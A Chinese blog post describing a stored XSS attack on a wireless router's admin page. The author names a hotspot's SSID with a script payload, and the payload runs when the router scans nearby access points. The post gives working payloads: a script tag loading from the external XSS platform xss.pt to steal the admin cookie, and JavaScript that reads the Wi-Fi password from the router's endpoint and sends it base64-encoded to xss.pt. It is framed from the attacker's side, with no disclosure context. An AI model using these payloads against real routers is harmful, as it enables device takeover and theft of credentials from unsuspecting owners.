主页 > 网络知识 > 骚姿势获取无线路由器后台权限

骚姿势获取无线路由器后台权限

今天本想使用台式机上网,然而身边并没有有线接入点。于是乎,想到可以利用无线路由器的WISP功能

正好从小伙伴那里蹭到了一个无线路由器

虽然丑但是好用哇,咱们登陆后台将路由器配置为无线信号放大模式

 

骚姿势获取无线路由器后台权限

 

emmmm,在选择无线信号名称这里我们发现了一个有意思的选项(扫描上级AP站点信息):

 

骚姿势获取无线路由器后台权限

 

扫描上级AP站点信息之后我们可以获取附近无线热点的一些简要信息,如SSID、MAC等等,如下图所示:

 

骚姿势获取无线路由器后台权限

 

于是我们就想到这样一种攻击思路,是否可以生成一个无线热点,把名字修改为XSS payload,是不是这样受害者在扫描附近AP信息的时候就会执行XSS

 

骚姿势获取无线路由器后台权限

 

emmm,我们先看看XSS注入点

 

骚姿势获取无线路由器后台权限

 

XSS注入点在元素内容处,我们可以直接使用<script>alert(1)</script>这类payload

 

使用手机生成一个热点名称为:%3d/><script>alert(1)</script>

 

骚姿势获取无线路由器后台权限

 

前面%3d/>没有用,只是为了方便以后测试。Emmm,居然没有任何过滤哈哈哈

 

骚姿势获取无线路由器后台权限

 

wink,光弹窗也不是回事呀,我们来试试获取管理员的cookie

 

骚姿势获取无线路由器后台权限

 

修改热点名称为:

<script src=http://xss.pt/ENRM></script>

再次扫描附近无线后,可以看到我们已经成功获得了被攻击者的Cookie

 

骚姿势获取无线路由器后台权限

 

emmm,作为攻击者现在我们可以登录路由器后台啦,但是我们还不知道无线密码是多少,我们来试试能不能通过JS读取Wi-Fi无线密码

 

首先我们先看看Wi-Fi密码存在什么位置

 

骚姿势获取无线路由器后台权限

 

虽然密码打*了,但是还是能读出来哒。我们不妨使用

var password = "nothing";var httpRequest = new XMLHttpRequest();    httpRequest.open('GET', 'http://192.168.2.1/goform/wirelessGetSecurity', true);    httpRequest.send();    httpRequest.onreadystatechange = function () {        if (httpRequest.readyState == 4 && httpRequest.status == 200) {            password = window.btoa(httpRequest.responseText);            console.log(password);            var sendPassword = new XMLHttpRequest();            sendPassword.open('GET', 'http://xss.pt/xss.php?do=api&id=ENRM&password='+ password, true);            sendPassword.send();        }    };

测试一下,可以看到console中已经打印出来密码信息

 

骚姿势获取无线路由器后台权限

 

通过抓包也可以看到请求已经发送至平台

 

骚姿势获取无线路由器后台权限

nice

 

 

骚姿势获取无线路由器后台权限

 

解码后我们就得到了Wi-Fi密码

 

骚姿势获取无线路由器后台权限

 

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!